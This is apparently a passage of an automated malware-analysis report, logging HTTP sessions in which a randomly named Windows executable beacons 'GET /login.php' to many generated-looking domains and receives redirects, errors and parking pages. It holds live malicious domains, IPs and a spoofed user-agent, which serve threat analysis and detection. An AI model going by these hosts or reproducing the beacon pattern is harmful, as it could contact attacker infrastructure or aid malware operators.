                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347482|1731347428|18|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  103192.168.2.659203162.255.119.102803328C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.877520084 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:22.403788090 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:22 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  104192.168.2.659212199.191.50.83806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.197483063 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702663898 CET861INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:26 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 28 31 30 29 3c 2f 68 33 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                  Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (10)</h3></div></body></html>


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  105192.168.2.659214178.162.203.226806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247227907 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  106192.168.2.65921544.221.84.105806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.249823093 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685672998 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347485|1731347428|6|6|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  107192.168.2.65921818.208.156.248806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250823021 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685869932 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347485|1731347428|19|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  108192.168.2.65921944.221.84.105806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251024008 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689420938 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347485|1731347428|7|5|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  109192.168.2.659220162.255.119.10280
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251224041 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.786689997 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  110192.168.2.659221154.212.231.82806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252132893 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.143194914 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  111192.168.2.6592133.94.10.3480
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.253488064 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685470104 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347485|1731347428|7|5|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  112192.168.2.65922299.83.170.3806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.256028891 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689449072 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Location: https://puzylyp.com/login.php
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  113192.168.2.659216199.59.243.22780
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.259053946 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.691929102 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:24 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: 2fa2f12c-f955-48a1-8935-1b6cffe0d01d
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:25 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692043066 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDg1LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  114192.168.2.659223188.114.96.3806212C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260509014 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.028939962 CET972INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:25 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqcDwVx95LJzOAj6qAQ7NjMTKLfoBwEHTVl2FywSYc%2FS46xqjtp0DNvwt9wHwoVJncepq9yUpMdJK98mF%2B2SUNaT74JWDzypZ7o0l5H%2BbxaQ2OA7764Y%2BUL%2FC5MMDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10215948614bd6-YUL
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11611&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  115192.168.2.65922644.221.84.105801476C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.951888084 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.046267986 CET334INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:26 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347486|1731347428|7|6|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


